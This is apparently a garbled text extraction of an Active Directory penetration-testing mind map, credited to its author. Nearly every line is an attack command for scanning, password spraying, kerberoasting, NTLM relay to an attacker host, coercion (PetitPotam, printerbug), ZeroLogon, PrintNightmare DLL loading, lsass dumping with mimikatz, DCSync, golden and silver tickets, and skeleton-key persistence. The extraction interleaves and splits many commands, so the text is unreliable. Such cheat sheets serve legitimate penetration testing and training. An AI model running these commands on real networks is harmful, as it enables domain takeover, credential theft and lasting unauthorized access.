Pivoting to others computers

psexec.py -hashes ":<hash>" <user>@<ip>

Bloodhound

wmiexec.py -hashes ":<hash>" <user>@<ip>

PowerView
atexec.py -hashes ":<hash>" <user>@<ip> "
command"
pass the hash

evil-winrm -i <ip>/<domain> -u <user> -H <

got administrator access on one machine
hash>

no credentials classic quick compromission methods mimikatz "privilege::debug" "sekurlsa::

Privilege escalation xfreerdp /u:<user> /d:<domain> /pth:<hash> /
procdump.exe -accepteula -ma lsass.exe lsass. minidump lsass.dmp" "sekurlsa::
java rmi exploit/multi/misc/java_rmi_server dmp logonPasswords" "exit" v:<ip>
cme smb <ip_range> # enumerate smb hosts winpeas.exe
ms17-010 exploit/windows/smb/ms17_010_eternalblue python getTGT.py <domain>/<user> -hashes :< export KRB5CCNAME=/root/impacket- python psexec.py <domain>/<user>@<ip> -k -
nmap -sP -p <ip> # ping scan mimikatz "privilege::debug" "token::elevate" "
search password files findstr /si 'password' *.txt *.xml *.docx hashes> examples/domain_ticket.ccache no-pass
sekurlsa::logonpasswords" "lsadump::sam" "
auxiliary/scanner/http/tomcat_enum exit"
nmap -PN -sV --top-ports 50 --open <ip> # Juicy Potato / Lovely Potato overpass the hash / pass the key (PTK) Rubeus ptt /ticket:<ticket>
quick scan tomcat/jboss manager exploit/multi/http/tomcat_mgr_deploy
get credentials post/windows/gather/smart_hashdump hashdump Rubeus asktgt /user:victim /rc4:<rc4value>
java serialized port ysoserial PrintSpoofer Rubeus createnetonly /program:C:\Windows\
nmap -PN --script smb-vuln* -p139,445 <ip> #
System32\[cmd.exe||upnpcont.exe] Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
Scan Network search smb vuln
RoguePotato
cme smb <ip_range> -u <user> -p <password> -
vulnerable product with cve searchsploit Low access M lsassy
find vulnerable host privilege::debug sekurlsa::tickets /export
nmap -PN -sC -sV <ip> # classic scan
Low hanging fruit SMBGhost CVE-2020-0796 sekurlsa::tickets /export
use scanner/smb/smb_enum_gpp cme smb <ip_range> -u <user> -p '<
nmap -PN -sC -sV -p- <ip> # full scan password>' --sam / --lsa / --ntds
MS14-025 CVE-2021-36934 (HiveNightmare/ Get tickets Rubeus dump /service:krbtgt /nowrap
findstr /S /I cpassword \\<FQDN>\sysvol\<
FQDN>\policies\*.xml SeriousSAM) PPLdump64.exe <lsass.exe|lsass_pid> lsass.
nmap -sU -sC -sV <ip> # udp scan
dmp Rubeus dump /luid:0xdeadbeef /nowrap
database credentials use admin/mssql/mssql_enum_sql_logins ...
mimikatz "!+" "!processprotect /process:lsass. Get-NetComputer -Unconstrained
Unconstrained delegation
nmcli dev show eth0 # show domain name & LSA as a Protected Process exe /remove" "privilege::debug" "token::
proxylogon
dns elevate" "sekurlsa::logonpasswords" "! Get-DomainComputer -Unconstrained -
processprotect /process:lsass.exe" "!-" #with Properties DnsHostName
proxyshell
nslookup -type=SRV _ldap._tcp.dc._msdcs.// mimidriver.sys
find AD IP got username but no password
Administrator access
DOMAIN/ Get unconstrained delegation machines MATCH (c:Computer {unconstraineddelegation:
search password files findstr /si 'password' *.txt *.xml *.docx true}) RETURN c
crackmapexec <IP> -u 'user' -p 'password' --
pass-pol search stored password lazagne.exe all
dig axfr <domain_name> @<name_server> MATCH (u:User {owned:true}), (c:Computer {
Get password policy
zone transfert enum4linx -u 'username' -p 'password' -P <IP>
unconstraineddelegation:true}), p=
mklink /d c:\shadowcopy \\?\GLOBALROOT\ shortestPath((u)-[*1..]->(c)) RETURN p
shadow copies diskshadow list shadows all Device\HarddiskVolumeShadowCopy1\
cme smb <dc-ip> -u user.txt -p password.txt -- privilege::debug sekurlsa::tickets /export
Password spray
no-bruteforce # test user=password .\incognito.exe execute -c "<domain>\<user>" sekurlsa::tickets /export
enum4linux -a -u "" -p "" <dc-ip> &&
enum4linux -a -u "guest" -p "" <dc-ip> credentials found .\incognito.exe list_tokens -u powershell.exe
cme smb <dc-ip> -u user.txt -p password.txt # token manipulation got an admin access ? Get tickets Rubeus dump /service:krbtgt /nowrap
smbmap -u "" -p "" -P 445 -H <dc-ip> && multiple test (carrefull of lock policy) use incognito impersonate_token <domain>\\<user>
smbmap -u "guest" -p "" -P 445 -H <dc-ip> Rubeus dump /luid:0xdeadbeef /nowrap
python GetNPUsers.py <domain>/ -usersfile < dpapi extract
smbclient -U '%' -L //<dc-ip> && smbclient -U ' Got valid username usernames.txt> -format hashcat -outputfile < got credentials Get-DomainComputer -TrustedToAuth -
hashes.domain.txt> hash found Constrained delegation
List guest access on smb guest%' -L //<dc-ip>
Get hash
Properties DnsHostName, MSDS-
GetADUsers.py -all -dc-ip <dc_ip> <domain>/< AllowedToDelegateTo
share cme smb <ip> -u '' -p '' # enumerate null Rubeus asreproast /format:hashcat Get all users username>
session MATCH (c:Computer), (t:Computer), p=((c)-[:
ASREPRoast Get-DomainUser -PreauthNotRequired - cme smb <ip> -u <user> -p <password> -- AllowedToDelegate]->(t)) RETURN p
Properties SamAccountName Get constrained delegation machines
cme smb <ip> -u 'a' -p '' # enumerate enumerate SMB share shares
anonymous access MATCH (u:User {owned:true}), (c:Computer {
Get ASREPRoastable users MATCH (u:User {dontreqpreauth:true}), (c: bloodhound-python -d <domain> -u <user> - name: "<MYTARGET.FQDN>"}), p=shortestPath((
Computer), p=shortestPath((u)-[*1..]->(c)) bloodhound p <password> -gc <dc> -c all u)-[*1..]->(c)) RETURN p
Active Directory nmap -n -sV --script "ldap* and not brute" -p
RETURN p

no smb signing || ipv6 enabled || adcs powerview / pywerview Resource-Based Constrained Delegation
389 <dc-ip>
Penetration Manual user found
Lateral move
Enumerate ldap ldapsearch -x -h <ip> -s base use exploit/windows/smb/smb_relay # GetUserSPNs.py -request -dc-ip <dc_ip> < lsadump::dcsync /domain:htb.local /user:
MS08-068 windows200 / windows server2008 domain>/<user>:<password> krbtgt # Administrators, Domain Admins, or
hash found
Get hash Enterprise Admins as well as Domain Controller
responder -I eth0 # disable smb & http ntlmrelayx.py -tf targets.txt Rubeus kerberoast dcsync computer accounts
enum4linux -U <dc-ip> | grep 'user:'
ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp - kerberoasting Get-DomainUser -SPN -Properties WSUSpendu.ps1 # need compromised WSUS
socks -debug SamAccountName, ServicePrincipalName WSUSpect server
crackmapexec smb <ip> -u <user> -p '<
password>' --users
user found sccm CMPivot
MATCH (u:User {hasspn:true}) RETURN u
Find user list ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<
Get kerberoastable users
nmap -p 88 --script=krb5-enum-users --script- relay mitm6 -i eth0 -d <domain> target> -l /tmp -socks -debug
args="krb5-enum-users.realm='<domain>', Got one account on the domain MATCH (u:User {hasspn:true}), (c:Computer), p= MSSQL Trusted Links use exploit/windows/mssql/mssql_linkcrawler
OSINT - enumerate username on internet userdb=<users_list_file>" <ip> ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ getST.py -spn cifs/<target> <domain>/< shortestPath((u)-[*1..]->(c)) RETURN p
ip> --delegate-access netbios_name>\$ -impersonate <user> rpcdump.py <domain>/<user>:<password>@< printerbug.py '<domain>/<username>:<
rpcclient $> lookupnames <name> Printers spooler service abuse domain_server> | grep MS-RPRN password>'@<Printer IP> <RESPONDERIP>
ntlmrelayx.py -t http://<dc_ip>/certsrv/ wmic useraccount get name,sid
nmap -Pn -sS -T4 --open --script smb-
certfnsh.asp -debug -smb2support --adcs -- Rubeus.exe asktgt /user:<user> /certificate:< auxiliary/admin/kerberos/ms14_068_kerberos_ GenericAll on User
security-mode -p445 ADDRESS/MASK
adcs template DomainController base64-certificate> /ptt checksum
unsigned SMB cracking hash GenericAll on Group
find smb not signed use exploit/windows/smb/smb_relay MS14-068 FindSMB2UPTime.py <ip>
goldenPac.py -dc-ip <dc_ip> <domain>/<
john --format=lm hash.txt user>:'<password>'@<target> kerberos::ptc "<ticket>" GenericAll / GenericWrite / Write on Computer
cme smb $hosts --gen-relay-list relay.txt
LM
hashcat -m 3000 -a 3 hash.txt dnscmd.exe /config /serverlevelplugindll <\\ sc \\DNSServer stop dns WriteProperty on Group
PetitPotam.py -d <domain> <listener_ip> < path\to\dll> # need a dnsadmin user sc \\DNSServer start dns
target_ip>
relay/poisoning john --format=nt hash.txt Self (Self-Membership) on Group
NTLM CVE-2021-1675.py <domain>/<user>:<
responder -i eth0 AD acl abuse aclpwn.py
password>@<target> '\\<smb_server_ip>\<
hashcat -m 1000 -a 3 hash.txt WriteProperty (Self-Membership)
user & hash found PrintNightmare share>\inject.dll'
mitm6 -d <domain>
john --format=netntlm hash.txt ForceChangePassword
dnstool.py -u 'DOMAIN\user' -p 'password' --
NTLMv1 enum dns record '*' --action query <dc_ip>
hashcat -m 5500 -a 3 hash.txt WriteOwner on Group
python3 cve-2020-1472-exploit.py <MACHINE_
BIOS_NAME> <ip> crack hash
find hash john --format=netntlmv2 hash.txt GenericWrite on User
secretsdump.py <DOMAIN>/<MACHINE_BIOS_
NAME>\$@<IP> -no-pass -just-dc-user " NTLMv2
Administrator" python3 restorepassword.py -target-ip <IP> < hashcat -m 5600 -a 0 hash.txt rockyou.txt WriteDACL + WriteOwner
secretsdump.py -hashes :<HASH_admin> < DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_
DOMAIN>/Administrator@<IP> BIOS_NAME> -hexpass <HEXPASS> john spn.txt --format=krb5tgs --wordlist= GPO Delegation
zerologon rockyou.txt Domain admin
Kerberos 5 TGS Get-LAPSPasswords -DomainController <ip_
hashcat -m 13100 -a 0 spn.txt rockyou.txt crackmapexec smb 127.0.0.1 -u <user> -p < dc> -Credential <domain>\<login> | Format-
password> -d <domain> --ntds Table -AutoSize
hashcat -m 18200 -a 0 AS-REP_roast-hashes
Kerberos ASREP rockyou.txt secretsdump.py '<domain>/<user>:<pass>'@< foreach ($objResult in $colResults){$
ip> objComputer = $objResult.Properties; $
get laps passwords
dump ntds.dit objComputer.name|where {$objcomputer.
Domain admin secretsdump.py -ntds ntds_file.dit -system name -ne $env:computername}|%{foreach-
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q SYSTEM_FILE -hashes lmhash:nthash LOCAL - object {Get-AdmPwdPassword -
q outputfile ntlm-extract ComputerName $_}}}

windows/gather/credentials/domain_hashdump python privexchange.py -ah <attacker_host_or_

ip> <exchange_host> -u <user> -d <domain> - ntlmrelayx.py -t ldap://<dc_fqdn>--escalate-
privexchange p <password> user <user>

ADCS

Mahyar@TajDini.net
Persistance mayfly (@M4yFly)

Github.com/mahyarx net group "domain admins" myuser /add /

domain Trust relationship

Mahyar TajDini Linkedin.com/in/mahyartajdini ticketer.py -nthash <nthash> -domain-sid < kerberos::golden /user:Administrator /krbtgt:<
Golden ticket domain_sid> -domain <domain> <user> Get-NetGroup -Domain <domain> - HASH_KRBTGT> /domain:<domain> /sid:<user_
Child Domain to Forest Compromise - SID GroupName "Enterprise Admins" -FullData| sid> /sids:<RootDomainSID-519> /ptt
Hijacking select objectsid mimikatz lsadump::trust
TajDini.net Silver Ticket

"kerberos::golden /user:Administrator /
PowerShell New-ItemProperty “HKLM:\System\
domain:<domain> /sid:
CurrentControlSet\Control\Lsa\” -Name
<domain_SID> /rc4:<trust_key> /service:krbtgt / .\Rubeus.exe asktgs /ticket:<kirbi file> /
“DsrmAdminLogonBehavior” -Value 2 -
Persistance "lsadump::trust /patch" target:<target_domain> /ticket: service:"Service's SPN" /ptt
DSRM PropertyType DWORD
Forest to Forest Compromise - Trust Ticket "lsadump::lsa /patch" <golden_ticket_path>"
Trust relationship
mimikatz "privilege::debug" "misc::skeleton" "
printerbug or petitpotam to force the DC of the
Skeleton Key exit"
external forest to connect on a local
unconstrained delegation machine. Capture
mimikatz "privilege::debug" "misc::memssp" " Breaking forest trust TGT, inject into memory and dcsync
Custom SSP exit" C:\Windows\System32\kiwissp.log

...